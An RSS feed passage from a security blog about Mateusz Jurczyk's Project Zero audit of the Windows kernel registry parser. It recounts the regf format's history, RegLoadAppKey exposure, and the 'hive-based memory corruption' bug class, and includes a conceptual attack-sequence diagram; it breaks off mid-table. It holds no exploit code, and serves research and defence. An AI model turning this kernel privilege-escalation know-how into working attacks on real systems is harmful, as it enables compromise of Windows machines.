  { term: &quot;PCA 2011&quot;, definition: &quot;Microsoft Windows Production CA 2011; signs pre-July-2025 boot managers and is still trusted on most fielded devices until REVISE migrates them to UEFI CA 2023.&quot; },
  { term: &quot;REVISE / dbx&quot;, definition: &quot;Secure Boot revocation infrastructure shipped under KB5025885 / CVE-2023-24932; the current Evaluation Phase adds the Windows Production PCA 2011 signing certificate to the dbx deny-list, which untrusts every boot manager signed by that certificate.&quot; },
  { term: &quot;Push Button Reset / DecryptVolume directive&quot;, definition: &quot;Legitimate WinRE sub-operation invoked by CVE-2025-48818 that disables BitLocker entirely after target-OS impersonation.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>bitlocker</category><category>winre</category><category>tpm</category><category>secure-boot</category><category>windows-security</category><category>full-disk-encryption</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>The Registry Adventure: How One Researcher Read 100,000 Lines of Windows Kernel C and Found 50 Bugs</title><link>https://paragmali.com/blog/the-registry-adventure-how-one-researcher-read-100000-lines-/</link><guid isPermaLink="true">https://paragmali.com/blog/the-registry-adventure-how-one-researcher-read-100000-lines-/</guid><description>Between May 2022 and December 2023, Mateusz Jurczyk audited the Windows registry parser and produced 50 CVEs. The methodology is the story.</description><pubDate>Sun, 24 May 2026 00:00:00 GMT</pubDate><content:encoded>
Between May 2022 and December 2023, Mateusz Jurczyk of Google Project Zero manually audited the Windows kernel registry parser and filed 39 bug reports under Project Zero&apos;s 90-day disclosure deadline plus 20 low-severity reports without deadline, which Microsoft serviced as 50 CVEs total (44 from the 90-day cohort and 6 more in a March 2024 bulletin). The bugs share a root cause: a thirty-year-old hybrid on-disk-and-in-memory format with a deterministic, unrandomized cell allocator that Microsoft cannot redesign without breaking backward compatibility to Windows NT 4.0. The methodology pivot is the story. Jurczyk started with a coverage-guided fuzzer, found one bug, then put the fuzzer down and read 100,000 lines of kernel C for twenty months. What the audit implies for the rest of the Windows kernel is the open question the article ends on.
&lt;h2&gt;1. I Loaded a Registry Hive From a Network Share and the Kernel Crashed&lt;/h2&gt;
&lt;p&gt;In May 2022, Mateusz Jurczyk pointed a coverage-guided fuzzer at the Windows registry. Within days the fuzzer crashed the kernel and produced CVE-2022-35768. Twenty months later, when he stopped, Jurczyk had filed thirty-nine bug reports against the same subsystem, Microsoft had assigned fifty CVEs to his name, and the fuzzer was sitting unused. Somewhere in those first few days, Jurczyk had realised that the bugs he actually wanted were ones a fuzzer could not see [@pz1-registry-adventure-1].&lt;/p&gt;
&lt;p&gt;The threat model is almost too small to fit on a slide. An unprivileged process running at Medium Integrity Level calls &lt;code&gt;RegLoadAppKey&lt;/code&gt; with the path of a file the attacker controls. The kernel opens the file, runs its in-house binary parser on the bytes, and exposes the resulting tree of keys back to the caller through a private handle. Microsoft&apos;s own documentation describes the surface this way: the hive becomes a private namespace reachable only through that handle, but &quot;the registry will prevent an application from accessing keys in this hive using an absolute path&quot; [@ms-regloadappkey]. The handle is sandboxed. The parser, which is the interesting part, is not. It runs in the kernel with attacker-supplied input, and it has been doing so since Windows Vista.&lt;/p&gt;

A file-and-in-memory tree of registry keys and values, encoded in Microsoft&apos;s regf binary format and operated on by the Windows kernel&apos;s Configuration Manager. Hives live on disk as `*.dat` files (plus `.log` and `.alt` companions) and are loaded into the kernel&apos;s address space when an application or the operating system opens them [@ms-registry-hives].

Medium Integrity Level: the integrity label an ordinary logged-in Windows user runs at. Crossing from Medium IL to SYSTEM is what a kernel local privilege escalation does. The class of bug this article is about reliably accomplishes that crossing from an attacker-supplied file.
&lt;p&gt;The fifty CVEs that Jurczyk&apos;s audit produced are not a uniform pile. Most of them are kernel local privilege escalations (LPEs); a handful are information disclosures; one is a denial of service [@pz1-registry-adventure-1]. The seventeen that matter for this article are the cohort Jurczyk later catalogued in his Project Zero post on practical exploitation: a tight set of memory-corruption bugs that share a single root cause and a single exploitation primitive, which he named &lt;strong&gt;hive-based memory corruption&lt;/strong&gt; [@pz8-registry-adventure-8].&lt;/p&gt;

flowchart TD
    A[&quot;Medium-IL user process&quot;] --&amp;gt; B[&quot;RegLoadAppKey API&quot;]
    B --&amp;gt; C[&quot;NtLoadKeyEx system call&quot;]
    C --&amp;gt; D[&quot;Configuration Manager dispatch&quot;]
    D --&amp;gt; E[&quot;Hv* hive parser&quot;]
    E --&amp;gt; F[&quot;Cell allocator and KCB tree&quot;]
    F --&amp;gt; G[&quot;Mapped section pages -- kernel address space&quot;]
&lt;p&gt;Two questions are doing all the work in this article. Why is a thirty-year-old binary parser running in the Windows kernel willing to accept arbitrary input from unprivileged users? And why did it take a single researcher twenty months to map the consequences? The first question is about Microsoft and design. The second is about Jurczyk and method. To take either one seriously, we have to start at the very beginning -- with Windows 3.1.&lt;/p&gt;
&lt;h2&gt;2. Why There Is a Hive Parser in the Kernel&lt;/h2&gt;
&lt;p&gt;In 1992 the registry was 64 kilobytes. Windows 3.1 shipped with a single file at &lt;code&gt;C:\WINDOWS\REG.DAT&lt;/code&gt;, encoded in a small custom format whose magic bytes spelled &lt;code&gt;SHCC3.10&lt;/code&gt;. It held one top-level key, no named values, and existed solely to register OLE objects and shell file-type associations [@pz2-registry-adventure-2]. The first &lt;code&gt;regedit.exe&lt;/code&gt; shipped alongside it. There was no security descriptor, no recovery story, and no kernel involvement. You could fit the whole thing in the L2 cache of a 2026 laptop.&lt;/p&gt;
&lt;p&gt;Windows NT 3.1, released in July 1993, swept that design away and introduced something different. The new format was called &lt;strong&gt;regf&lt;/strong&gt;, and the design decision that has determined the next thirty-three years of Windows kernel security was made here: &lt;em&gt;the on-disk format and the in-memory format are the same format&lt;/em&gt;. Jurczyk&apos;s blog post on the regf file format states this plainly: &quot;the regf format aims to bypass the reparsing step -- likely to optimize the memory/disk synchronization process -- and reconcile the two types of data encodings into a single one... This unique approach comes with its own set of challenges, and has been a contributing factor in a number of historical vulnerabilities&quot; [@pz5-registry-adventure-5].&lt;/p&gt;

Microsoft&apos;s binary registry file format, introduced in Windows NT 3.1 (1993) and stabilized at v1.3 in NT 4.0 (1996). Later versions (v1.4 Whistler beta, v1.5 XP, v1.6 Win10 AU) layer features on top but all remain cross-compatible with the v1.3 baseline. The same format encodes a hive on disk and in kernel memory; there is no separate &quot;loaded&quot; representation [@pz5-registry-adventure-5]. Microsoft has never published an official regf specification [@pz5-registry-adventure-5].
&lt;p&gt;The motivation was reasonable. NT was a multi-user, securable, network-capable operating system targeting servers; its configuration store needed access control, transactional recovery, and the ability to grow well past 64 KiB. Reusing the same byte layout for disk and memory meant a hive could be loaded by mapping or copying its file image, modified in place, and flushed back without a serialization step.&lt;/p&gt;
&lt;p&gt;Pre-release builds used regf v1.0; the first shipping NT used v1.1; NT 3.5 and 3.51 used v1.2 [@pz2-registry-adventure-2]. The Win9x consumer line went a different direction entirely, with an incompatible format called CREG that never made it into the NT lineage and quietly died with Windows Me.Windows 95, 98, and Me used a completely incompatible CREG format that did not survive into NT. The modern registry inherits nothing from the Win9x line; every memory corruption bug Jurczyk found descends from the NT 3.1 decision.&lt;/p&gt;
&lt;p&gt;The next stabilization happened on July 29, 1996. Windows NT 4.0 (whose pre-RTM development builds had introduced v1.3 in 1995) froze the &lt;em&gt;backward-compatibility baseline&lt;/em&gt; at regf v1.3, added a &quot;fast leaves&quot; optimization for subkey lookups, and locked in the binary layout that the modern Windows kernel still reads thirty years later. Later versions layered features on top -- v1.4 (Whistler beta, big values), v1.5 (Windows XP, 2001, hash leaves), and v1.6 (Windows 10 Anniversary Update, 2016, layered keys) -- but every one of them remains cross-compatible with v1.3-aware parsers, and v1.3 itself still encodes a number of Windows 11 hives [@pz5-registry-adventure-5].&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s own documentation for &lt;code&gt;RegSaveKeyExA&lt;/code&gt; describes &lt;code&gt;REG_STANDARD_FORMAT&lt;/code&gt; as &quot;the only format supported by Windows 2000,&quot; meaning that hives written by Windows 2000 and later, in the default format, are interchangeable with hives produced by Windows NT 4.0 [@ms-regsavekeyex]. A hive file authored on NT 4.0 in 1996 will still mount on Windows 11 in 2026. That backward compatibility is not an accident; it is a load-bearing requirement of system-image management, forensics, and third-party installers.&lt;/p&gt;

gantt
    title Registry format evolution
    dateFormat YYYY
    axisFormat %Y
    section Win 3.x
    reg.dat (SHCC3.10) :1992, 1993
    section NT 3.x
    regf v1.0 to v1.2  :1992, 1996
    section NT 4.0+
    regf v1.3 (standard) :1996, 2026
    section XP
    regf v1.5 (hash leaves) :2001, 2026
    section Vista
    RegLoadAppKey + KTM  :2006, 2026
    section Win 8.1
    LOG1 and LOG2 logging :2013, 2026
    section Win 10 RS4
    Section-backed hives  :2018, 2026
    section Win 10 AU
    regf v1.6 (layered keys) :2016, 2026
&lt;p&gt;Ten years later, in November 2006, Windows Vista added the second design decision that completes the threat model. &lt;code&gt;RegLoadAppKey&lt;/code&gt; shipped as a public Win32 API, allowing an unprivileged application to load an arbitrary hive file as a private &quot;application hive&quot; reachable only through the returned handle [@ms-regloadappkey]. The motivation was legitimate; per-application configuration sidecars are a reasonable feature.&lt;/p&gt;
&lt;p&gt;The consequence was that the kernel-mode regf parser, frozen at v1.3 a decade earlier and unchanged in any of its load-bearing routines, was now reachable from Medium IL with no special privileges. Jurczyk&apos;s introduction to the series says it plainly: &quot;arbitrary registry hives can be loaded from disk without any special privileges via the &lt;code&gt;RegLoadAppKey&lt;/code&gt; API (since Windows Vista)&quot; [@pz1-registry-adventure-1].&lt;/p&gt;

A Win32 API introduced in Windows Vista (2006) that lets an unprivileged process load an arbitrary hive file as a private &quot;app hive,&quot; running the full kernel-mode regf parser on attacker-supplied bytes. Microsoft documents the API as one that &quot;loads the specified registry hive as an application hive&quot; reachable only through a private handle; the parser itself is not sandboxed [@ms-regloadappkey].
&lt;p&gt;With the parser reachable from low privilege and the format frozen for thirty years, the only question left was who would notice.&lt;/p&gt;
&lt;h2&gt;3. Prior Attempts: The &quot;Fuzzed Precisely Once&quot; Misconception&lt;/h2&gt;
&lt;p&gt;Before we go further, a fact you may have heard in a conference Q&amp;amp;A: the Windows registry is &quot;the most-fuzzed subsystem in Windows,&quot; &quot;fuzzed precisely once,&quot; by one person. It is not true. The registry has been poked at, in one form or another, since 1996. None of those efforts found the bug class that Jurczyk would eventually name -- but that is a different statement, and the difference is the point of this section.&lt;/p&gt;
&lt;p&gt;The first instrument to touch the registry from outside Microsoft was Mark Russinovich and Bryce Cogswell&apos;s &lt;strong&gt;RegMon&lt;/strong&gt;, released in 1996 as a Sysinternals utility. RegMon was a kernel driver that intercepted every registry call and surfaced the path, type, process identifier, and result to a user-mode console. It was operational tooling, not a bug-finding tool. Microsoft&apos;s own page on the modern successor, Process Monitor, attributes the lineage to Russinovich and notes that Procmon &quot;combines the features of two legacy Sysinternals utilities, Filemon and Regmon&quot; [@ms-procmon]. RegMon made the registry observable from outside the kernel. It could not see corruption inside a hive.&lt;/p&gt;
&lt;p&gt;The next wave came from forensics. Microsoft never published a regf specification, so the digital-forensics community reverse-engineered one. Timothy D. Morgan&apos;s regfi paper appeared at DFRWS in 2009. Joachim Metz&apos;s libregf project published its first format-spec document in July 2009 and has been updated continuously through 2026 [@libregf-spec]. Maxim Suhanov&apos;s regf specification covers, among other things, the old single-&lt;code&gt;.log&lt;/code&gt; dirty-vector recovery format and the new two-file LOG1/LOG2 layout introduced in Windows 8.1 [@msuhanov-spec]. These were user-space parsers built to mount hive files for evidence extraction. They exercised the format from the outside. They never touched the kernel parser.&lt;/p&gt;
&lt;p&gt;A separate research line, in parallel, pursued the layer &lt;em&gt;above&lt;/em&gt; the parser. James Forshaw of Project Zero spent years hunting capability and access-control bugs in the registry&apos;s name-resolution and permission logic -- registry symbolic links, virtualization quirks, sandbox-escape paths that ride on registry redirection. Jurczyk&apos;s PZ #4 covers some of this surface in passing, noting that the registry has at least four distinct ways in which &quot;access to a registry key can be transparently redirected to another path&quot; [@pz4-registry-adventure-4]. These were logic bugs, not memory-corruption bugs. The parser was not the target.&lt;/p&gt;
&lt;p&gt;Then, in 2016, Jurczyk and Forshaw collaborated on a black-box bitflipping fuzzing pass against &lt;code&gt;RegLoadKey&lt;/code&gt; and &lt;code&gt;RegLoadAppKey&lt;/code&gt;. Jurczyk acknowledges the collaboration directly in his retrospective: &quot;I was also somewhat familiar with basic harnessing of the registry, having fuzzed it in 2016 together with James Forshaw&quot; [@pz1-registry-adventure-1]. The cohort produced a handful of registry bug reports filed as Project Zero issues #873, #874, #876, and #993.&lt;/p&gt;
&lt;p&gt;It did not find the hive-memory-corruption class. The reason is the same one that would defeat the 2022 fuzzer: random byte flips on a hive file produce a malformed-but-rejected hive far more often than they produce one that passes base-block validation, enters the parser proper, and exercises an interesting bug.Per-issue contents of the 2016 cohort are not anonymously fetchable; the Project Zero tracker now lives at &lt;code&gt;project-zero.issues.chromium.org&lt;/code&gt; and redirects unauthenticated requests to a Google sign-in page [@pz-tracker-root]. The cohort&apos;s existence is primary-source-confirmed by Jurczyk&apos;s reference in PZ #1.&lt;/p&gt;

The hive binary format is not very well suited for trivial bitflipping-style fuzzing, because it is structurally simple, and random mutations are much more likely to render (parts of) the hive unusable than to trigger any interesting memory safety violations. -- Mateusz Jurczyk, *The Windows Registry Adventure #1* [@pz1-registry-adventure-1]
&lt;p&gt;In early 2022, Jurczyk made a more serious attempt. He built a &lt;strong&gt;coverage-guided Bochs-based kernel fuzzer&lt;/strong&gt;, the same lineage as his earlier Bochspwn work, and pointed it at the kernel&apos;s hive-loading path. Within days the harness produced its first registry kernel bug, filed as Project Zero issue #2299 and assigned CVE-2022-35768 by Microsoft. The fuzzer worked. It just did not scale to the bug class Jurczyk actually wanted, which is the part of the story that matters.&lt;/p&gt;
&lt;p&gt;A frequent third-party confusion is worth naming and dispatching here. &lt;strong&gt;Bochspwn Reloaded is not the registry-research tool.&lt;/strong&gt; The repository&apos;s own README describes the goal as detecting &quot;the disclosure of uninitialized kernel stack/heap memory,&quot; not memory corruption, and reports &quot;over 70 bugs in the Windows kernel&quot; found by the tool in 2017 and early 2018 [@bochspwn-reloaded-repo]. The 2018 white paper makes the same scope clear; the project&apos;s technical content is about shadow-memory representation and tainting stack frames and pool allocations to catch infoleaks [@bochspwn-reloaded-paper]. The 2022 Bochs-based registry harness is a separate, unreleased instrument sharing the lineage but not the codebase.&lt;/p&gt;

A 2018 Bochs-based Project Zero tool by Mateusz Jurczyk for detecting uninitialized kernel memory disclosures via taint tracking [@bochspwn-reloaded-repo]. *Not* the registry-audit instrument. The 2022 coverage-guided Bochs registry harness is a separate, unreleased tool that shares Bochspwn&apos;s general design but is not the public Bochspwn Reloaded repository.

flowchart LR
    A[&quot;RegMon (1996)&lt;br /&gt;Operational visibility&quot;] --&amp;gt; B[&quot;Forensic parsers&lt;br /&gt;regfi, libregf, msuhanov&lt;br /&gt;2008 to present&quot;]
    B --&amp;gt; C[&quot;Forshaw logic bugs&lt;br /&gt;Sym-links, virtualization&lt;br /&gt;2014 to present&quot;]
    C --&amp;gt; D[&quot;Jurczyk-Forshaw fuzz&lt;br /&gt;Bitflipping RegLoadKey&lt;br /&gt;2016&quot;]
    D --&amp;gt; E[&quot;Bochs coverage fuzz&lt;br /&gt;One good bug&lt;br /&gt;2022&quot;]
    E --&amp;gt; F[&quot;Jurczyk manual audit&lt;br /&gt;50 CVEs&lt;br /&gt;2022 to 2023&quot;]
&lt;p&gt;Every prior attempt had hit the same ceiling. The bug class lived in the code, not in the file. And the code had not yet been read.&lt;/p&gt;
&lt;h2&gt;4. Six Generations of Hardening Without Redesign&lt;/h2&gt;
&lt;p&gt;Between 1992 and 2018, Microsoft shipped six generations of registry changes. Not one of them redesigned the parser. Every generation added a feature, hardened a recovery path, lifted a scale limit, or shifted a memory model. Each of those changes also created new surface for the next decade&apos;s attackers. The cell allocator at the heart of the format has been substantively the same routine for twenty-five years.&lt;/p&gt;
&lt;p&gt;The table below collapses Stage 2&apos;s defensive arc into one view. Each row is a generation; the &quot;Surface effect&quot; column captures the bug class that became reachable as a side effect of the improvement.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Gen&lt;/th&gt;
&lt;th&gt;Year&lt;/th&gt;
&lt;th&gt;What was added&lt;/th&gt;
&lt;th&gt;Surface effect&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;A-1&lt;/td&gt;
&lt;td&gt;1992&lt;/td&gt;
&lt;td&gt;&lt;code&gt;reg.dat&lt;/code&gt; / SHCC3.10, 64 KiB OLE database&lt;/td&gt;
&lt;td&gt;None in the kernel; user-mode only [@pz2-registry-adventure-2]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;A-2&lt;/td&gt;
&lt;td&gt;1993&lt;/td&gt;
&lt;td&gt;regf v1.0/v1.1, hybrid on-disk and in-memory&lt;/td&gt;
&lt;td&gt;Every memory-corruption bug class to follow [@pz5-registry-adventure-5]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;A-3&lt;/td&gt;
&lt;td&gt;1996&lt;/td&gt;
&lt;td&gt;regf v1.3 lock-in, fast-leaves optimization&lt;/td&gt;
&lt;td&gt;30-year backward compatibility freezes the parser [@ms-regsavekeyex]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;A-3b&lt;/td&gt;
&lt;td&gt;2001 / 2016&lt;/td&gt;
&lt;td&gt;regf v1.5 (XP, hash leaves), v1.6 (Win10 AU, layered keys)&lt;/td&gt;
&lt;td&gt;New features, same v1.3-cross-compatible parser core [@pz5-registry-adventure-5]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;A-4&lt;/td&gt;
&lt;td&gt;2006&lt;/td&gt;
&lt;td&gt;&lt;code&gt;RegLoadAppKey&lt;/code&gt;, KTM transactions&lt;/td&gt;
&lt;td&gt;Parser becomes reachable from Medium IL with no privileges [@ms-regloadappkey]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;A-5&lt;/td&gt;
&lt;td&gt;2013&lt;/td&gt;
&lt;td&gt;LOG1/LOG2 incremental write-ahead logging&lt;/td&gt;
&lt;td&gt;New log-replay path becomes attacker-influenceable [@pz5-registry-adventure-5]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;A-6&lt;/td&gt;
&lt;td&gt;2018&lt;/td&gt;
&lt;td&gt;Section-backed hive mapping&lt;/td&gt;
&lt;td&gt;Pages become pageable; double-fetch class enabled [@pz5-registry-adventure-5]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Each row deserves a sentence. &lt;strong&gt;A-1&lt;/strong&gt; is the registry&apos;s prehistory; nothing here lives in the kernel, but the hierarchical key/value mental model is established. &lt;strong&gt;A-2&lt;/strong&gt; is the load-bearing decision: hybrid on-disk and in-memory format, modified in place [@pz5-registry-adventure-5]. &lt;strong&gt;A-3&lt;/strong&gt; is the moment Microsoft signed a thirty-year contract; the format defined by &lt;code&gt;REG_STANDARD_FORMAT&lt;/code&gt; is binary-compatible with NT 4.0 [@ms-regsavekeyex].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;A-3b&lt;/strong&gt; is the format-level feature layering done since: v1.5 (Windows XP, 2001) added hash leaves to speed up large subkey lookups, and v1.6 (Windows 10 Anniversary Update, 2016) added layered keys for differencing hives; both stay cross-compatible with v1.3-aware parsers, and v1.3 still encodes a number of Windows 11 hives [@pz5-registry-adventure-5]. &lt;strong&gt;A-4&lt;/strong&gt; is the entry-point change: &lt;code&gt;RegLoadAppKey&lt;/code&gt; and the Kernel Transaction Manager arrive together in Vista, and both are now attacker-reachable [@ms-regloadappkey].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;A-5&lt;/strong&gt; introduces the new log format; PZ #5 describes &quot;incremental logging added in Windows 8.1&quot; as one of the two big runtime-recovery overhauls of the modern era [@pz5-registry-adventure-5]. &lt;strong&gt;A-6&lt;/strong&gt; is the section-backed mapping shipped in Windows 10 RS4 (April 2018), and is the change that makes a hive on an SMB share into a moving target -- hive pages become pageable, and a page that was validated on load can be evicted and re-read with different contents [@pz5-registry-adventure-5].Some Windows 11 system hives, such as &lt;code&gt;UsrClass.dat&lt;/code&gt; under &lt;code&gt;HKU\&amp;lt;SID&amp;gt;_Classes&lt;/code&gt;, are still written in regf v1.3 -- a format frozen in 1996. The backward-compatibility freeze is not a hypothetical concern [@pz5-registry-adventure-5].&lt;/p&gt;

The unit of allocation inside a hive. A length-prefixed chunk of bytes; positive prefix means the cell is free, negative prefix means it is allocated, and the absolute value of the prefix is the size in bytes (multiples of eight). Cells are the building blocks of keys, values, security descriptors, and index nodes [@msuhanov-spec].

Key Control Block: the in-memory kernel object that represents an open registry key. It holds the cell index of the on-disk key node, a parent pointer, a refcount, and a per-key synchronization primitive [@pz6-registry-adventure-6]. The KCB tree is the live representation of every currently-open registry key.
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Each generation added new mitigation, new performance, or new functionality. None redesigned the cell allocator, the cell-index-to-virtual-address translation, or the hybrid on-disk-and-in-memory layout. Six generations of mitigation; one unmoved load-bearing routine.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Mapping the result is helpful before we get to the audit. Here is what a hive looks like in the 2025-era kernel from the bytes on disk up to the kernel-object tree that user-mode code touches.&lt;/p&gt;

flowchart TD
    A[&quot;Hive file on disk&lt;br /&gt;REGF base block + HBINs&quot;] --&amp;gt; B[&quot;Memory-mapped section&lt;br /&gt;pageable pages&quot;]
    B --&amp;gt; C[&quot;_HHIVE structure&lt;br /&gt;0x600 bytes, hive descriptor&quot;]
    C --&amp;gt; D[&quot;_CMHIVE structure&lt;br /&gt;0x12F8 bytes, kernel state&quot;]
    D --&amp;gt; E[&quot;Cell map&lt;br /&gt;cell-index translation&quot;]
    E --&amp;gt; F[&quot;Hv* allocator&lt;br /&gt;HvAllocateCell, HvFreeCell&quot;]
    F --&amp;gt; G[&quot;KCB tree&lt;br /&gt;open keys in kernel memory&quot;]
    G --&amp;gt; H[&quot;User-mode handles via NtCreateKey&quot;]
&lt;p&gt;The diagram is not a model; it is the structure. PZ #6 documents the exact sizes: &lt;code&gt;_CMHIVE&lt;/code&gt; is 0x12F8 bytes and contains an embedded &lt;code&gt;_HHIVE&lt;/code&gt; of 0x600 bytes at offset zero [@pz6-registry-adventure-6]. None of these objects existed in NT 3.1; what existed was the bottom three layers and a simpler kernel-side wrapper. The architecture grew. The cell allocator did not.&lt;/p&gt;
&lt;p&gt;By 2018 the parser had been substantively unchanged for twenty-five years, and nobody had read all of it.&lt;/p&gt;
&lt;h2&gt;5. The Pivot: Audit, Not Fuzz&lt;/h2&gt;
&lt;p&gt;Return to May 2022, but now with the full context loaded. Six generations of hardening have created a thirty-year-old attack surface. Forty years of forensic and security research have not penetrated the parser. Jurczyk is sitting at his desk with a working coverage-guided Bochs harness and one good registry bug, and instead of letting the fuzzer run for another six months, he stops.&lt;/p&gt;
&lt;p&gt;The detective work that produced the stop is documented in the introduction to the series. Jurczyk noticed two facts that together amount to a methodology critique.&lt;/p&gt;
&lt;p&gt;First, the regf format is &quot;structurally simple&quot; in the sense that bitflipping a random byte usually produces an invalid base-block checksum, an out-of-range cell offset, or some other condition that the kernel rejects long before it reaches anything interesting [@pz1-registry-adventure-1]. The base-block validator is doing a lot of work.&lt;/p&gt;
&lt;p&gt;Second, the bug class he was chasing -- one that produces kernel memory corruption from an attacker-controlled hive -- requires &lt;em&gt;legal-on-disk&lt;/em&gt; hives that exercise particular &lt;em&gt;combinations&lt;/em&gt; of features. The interesting bugs live in interactions: transactions plus virtualization plus predefined keys plus log replay, all in the same legal hive image. No byte-level mutator is going to synthesize that.&lt;/p&gt;
&lt;p&gt;So Jurczyk did something almost retro. He pulled &lt;code&gt;ntoskrnl.exe&lt;/code&gt; with public PDB symbols into the kind of static-and-dynamic analysis toolchain PZ #3 enumerates -- IDA Pro for cross-referencing, WinDbg attached to a kernel target, Ghidra alongside [@pz3-registry-adventure-3] -- and started reading the Configuration Manager. He cross-referenced every entry point against &lt;code&gt;libregf&lt;/code&gt;, against Suhanov&apos;s spec, and against &lt;em&gt;Windows Internals, Part 2, 7th edition&lt;/em&gt; by Allievi, Russinovich, Ionescu, and Solomon [@winint7-part2; @libregf-spec; @msuhanov-spec]. Every attacker-reachable function got traced to every cell read, write, free, and allocation on every path. PZ #3 lists the bibliography he assembled along the way and marks the Russinovich book with the equivalent of a gold star [@pz3-registry-adventure-3]. The methodology is twentieth-century. The yield is not.&lt;/p&gt;
&lt;p&gt;The numbers came in twenty months later. Per PZ #1, the audit produced 39 bug reports, which Microsoft serviced as 44 CVEs in the 90-day cohort plus 6 more in a March 2024 low-severity batch, for 50 CVEs total; the average time from report to fix was 81 days [@pz1-registry-adventure-1]. By December 2024, with more Microsoft CVE assignments rolling in, PZ #5 was reporting 52 CVEs [@pz5-registry-adventure-5]. By May 2025, PZ #7 was at 53 [@pz7-registry-adventure-7]. The growth across the publication arc reflects CVE assignment, not new discoveries. &quot;50+&quot; is the safe headline figure.&lt;/p&gt;
&lt;p&gt;Inside those 50 CVEs, a tight subset of 17 share a single root cause and a single exploitation primitive [@pz8-registry-adventure-8]. Jurczyk&apos;s PZ #8 gives them a name -- &lt;strong&gt;hive-based memory corruption&lt;/strong&gt; -- and divides them into two subclasses. &lt;em&gt;Spatial&lt;/em&gt; violations are cell-boundary overflows: writes that cross the boundary of a legitimately-allocated cell into an adjacent cell whose type, owner, or pointer the attacker now controls. &lt;em&gt;Temporal&lt;/em&gt; violations are cell-reuse use-after-frees: writes through a cell-index reference whose backing storage has been freed and reallocated to attacker-influenced content. Spatial and temporal together; everything else is detail.&lt;/p&gt;

Mateusz Jurczyk&apos;s coinage for the bug class that corrupts the in-memory representation of an active hive via the deterministic cell allocator [@pz8-registry-adventure-8]. The spatial subclass is cell-boundary overflows. The temporal subclass is cell-reuse use-after-frees. The class is named in PZ #8 and demonstrated on Windows 11 with all modern kernel mitigations enabled.
&lt;p&gt;The exploitation primitive is the deliberate engineering of the cell allocator, and PZ #8 is unsentimental about it.&lt;/p&gt;

The registry cell allocator... completely lacks any safeguards against memory corruption, and... has no element of randomness, making its behavior entirely predictable. -- Mateusz Jurczyk, *The Windows Registry Adventure #8* [@pz8-registry-adventure-8]
&lt;p&gt;A deterministic, unrandomized allocator with no integrity checks on its cell metadata is what you would design if you wanted recovery from a torn write to produce the same byte image every time. It is also, identically, what you would design if you wanted an exploit primitive that places a controlled object at a predictable cell index. The property that makes the parser correct under crash recovery and the property that makes it exploitable are the same property.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The bug class was semantic. The fuzzer was syntactic. That mismatch is the audit&apos;s entire reason for existing.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;How does an attacker-controlled hive actually become a corruption primitive? The sequence is shorter than you might expect.&lt;/p&gt;

sequenceDiagram
    participant U as Medium-IL process
    participant K as Configuration Manager
    participant V as Base-block validator
    participant P as Bin and cell parser
    participant A as Cell allocator
    U-&amp;gt;&amp;gt;K: RegLoadAppKey(hive_path)
    K-&amp;gt;&amp;gt;V: Validate REGF header
    V-&amp;gt;&amp;gt;P: Walk HBINs, accept legal cells
    P-&amp;gt;&amp;gt;A: Reserve cell indices for keys, values, security
    A-&amp;gt;&amp;gt;P: Hand back deterministic indices
    P-&amp;gt;&amp;gt;K: Build cell map, expose KCB
    Note over A,P: Attacker-shaped cells now live at predictable kernel addresses
    K-&amp;gt;&amp;gt;U: Return private handle
    U-&amp;gt;&amp;gt;K: Trigger second-stage operation (e.g., transaction abort)
    K-&amp;gt;&amp;gt;A: Spatial or temporal violation fires
&lt;p&gt;The diagram makes the loss of generality clear. The base-block validator does its job; the bin and cell parser accept a &lt;em&gt;legal&lt;/em&gt; hive; the cell allocator places attacker-shaped cells at &lt;em&gt;deterministic&lt;/em&gt; indices; and then a second-stage operation -- a transaction abort, a log replay, a predefined-key dereference -- reuses a cell index whose backing storage no longer means what the kernel assumes. There is no point in the lifecycle where a fuzzer&apos;s mutator could have engineered the legal-on-disk-but-semantically-explosive hive that the audit&apos;s reader engineered by hand.&lt;/p&gt;
&lt;p&gt;Coverage-guided fuzzing and manual audit are not equivalent tools on this target. The empirical numbers from the same researcher, on the same target, are instructive.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Method&lt;/th&gt;
&lt;th&gt;Researcher-months&lt;/th&gt;
&lt;th&gt;Good registry kernel bugs&lt;/th&gt;
&lt;th&gt;Empirical rate&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Bitflipping fuzz of &lt;code&gt;RegLoadKey&lt;/code&gt; / &lt;code&gt;RegLoadAppKey&lt;/code&gt; (2016)&lt;/td&gt;
&lt;td&gt;~few [@pz1-registry-adventure-1]&lt;/td&gt;
&lt;td&gt;4 (PZ #873, #874, #876, #993)&lt;/td&gt;
&lt;td&gt;~1 per month or worse&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Bochs coverage-guided harness (early 2022)&lt;/td&gt;
&lt;td&gt;~1 to 2&lt;/td&gt;
&lt;td&gt;1 (CVE-2022-35768)&lt;/td&gt;
&lt;td&gt;~0.5 to 1 per month&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Manual audit (May 2022 -- December 2023)&lt;/td&gt;
